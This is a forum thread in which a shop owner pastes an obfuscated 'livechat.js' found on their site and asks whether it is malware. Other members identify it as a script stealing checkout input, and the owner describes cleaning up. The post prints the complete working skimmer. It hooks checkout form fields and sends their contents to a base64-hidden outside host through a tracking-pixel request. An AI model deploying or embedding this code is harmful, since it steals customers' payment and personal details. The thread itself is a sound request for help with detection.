Post by tt87 » Tue Jan 22, 2019 10:14 pm

Is livechat.js script normal to be running on the website? Or is this malware stealing information?

https://www.hergbenet.ro/wp-data/livechat.js

function IrDvbNXumt(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,t){return String.fromCharCode(parseInt(t,16))}))}function lmVibHTBLP(){Array.from(document.getElementsByTagName("input")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this, '0')"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '0');"+e.getAttribute("onchange"))}),Array.from(document.getElementsByTagName("select")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this, '1');"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '1');"+e.getAttribute("onchange"))}),Array.from(document.getElementsByTagName("textarea")).forEach(function(e,t){null==e.getAttribute("onchange")?e.setAttribute("onchange","SAcSpFtVQg(this), '2'"):-1==e.getAttribute("onchange").search(/SAcSpFtVQg/i)&&e.setAttribute("onchange","SAcSpFtVQg(this, '2');"+e.getAttribute("onchange"))})}function SAcSpFtVQg(e,t){var n=[];n.push("url%"+location.hostname),n.push("type:2"),"1"!=t?e.value.length>0&&(0==e.name.length?n.push(e.id+"%"+e.value):0!=e.name.length&&n.push(e.name+"%"+e.value),aQwCiGbwKo(n)):e.value.length>0&&(-1!=e.id.search("zone|region|state")||-1!=e.name.search("zone|region|state"))?(e.value.replace(/[^-0-9]/gim,""),e.value,0==e.name.length?n.push(e.id+"%"+e.options[e.selectedIndex].text):0!=e.name.length&&n.push(e.name+"%"+e.options[e.selectedIndex].text),aQwCiGbwKo(n)):(0==e.name.length?n.push(e.id+"%"+e.value):0!=e.name.length&&n.push(e.name+"%"+e.value),aQwCiGbwKo(n))}function aQwCiGbwKo(e){if(JSON.stringify(KZgKcnPvnh)==JSON.stringify(e))return!1;KZgKcnPvnh=e;var t=89999*Math.random()+1e4,n=JSON.stringify(e),a=document.createElement("img");a.width="1px",a.height="1px",a.id=t,a.src=atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=")+"?image_id="+IrDvbNXumt(n),document.body.appendChild(a),setTimeout(document.getElementById(t).remove(),3e3)}function Default_Send(){var e=[];e.push("url%"+location.hostname),e.push("type%2"),Array.from(document.getElementsByTagName("input")).forEach(function(t,n){t.value.length>0&&(0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value))}),Array.from(document.getElementsByTagName("select")).forEach(function(t,n){t.value.length>0&&(-1!=t.id.search("zone|region|state")||-1!=t.name.search("zone|region|state"))?(t.value.replace(/[^-0-9]/gim,""),t.value,0==t.name.length?e.push(t.id+"%"+t.options[t.selectedIndex].text):0!=t.name.length&&e.push(t.name+"%"+t.options[t.selectedIndex].text)):0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value)}),Array.from(document.getElementsByTagName("textarea")).forEach(function(t,n){t.value.length>0&&(0==t.name.length?e.push(t.id+"%"+t.value):0!=t.name.length&&e.push(t.name+"%"+t.value))}),aQwCiGbwKo(e)}var KZgKcnPvnh=[];window.onload=function(){-1!=location.href.search("checkout")&&(Default_Send(),setInterval("Default_Send()",3e3),setInterval("lmVibHTBLP()",1500))};

New member

Posts

Joined
Mon Sep 21, 2015 7:08 am

Post by xxvirusxx » Tue Jan 22, 2019 11:12 pm

You use wordpress right?

My Extensions | OC 3.0.3.1, 3.0.2.0, 2.3.0.2 with bugs fixed | 2.3.0.2 Custom version | Buy me a beer or coffee


Active Member

Posts

Joined
Tue Jul 17, 2012 10:35 pm

Post by tt87 » Wed Jan 23, 2019 4:44 am

No I do not why?

edit: Actually, I did have word press installed on the same location as opencart back in 2015. Is it possible it would be running on opencart?

New member

Posts

Joined
Mon Sep 21, 2015 7:08 am

Post by ADD Creative » Wed Jan 23, 2019 11:44 pm

I've looked at the script and it looks like it's designed to steal customer input from your checkout page. You should remove it and check you site for any other changes.

However, from the domain you posted you look to be running WordPress with WooCommerce and not OpenCart.

www.add-creative.co.uk


Active Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by tt87 » Thu Jan 24, 2019 12:04 am

The link I posted is not my website, that is the link for the cookie/script that was running on my website. My website is completely different which is why it was so suspicious of course. I removed a suspicious php file from my public_html location and also removed the wordpress installation. The cookie/script now seems to be gone. Will continue to monitor. I wonder if this malicious script was installed through the wordpress installation? Good lesson might be to never have opencart and other installations such as wordpress in the same location.

New member

Posts

Joined
Mon Sep 21, 2015 7:08 am
Who is online

Users browsing this forum: No registered users and 13 guests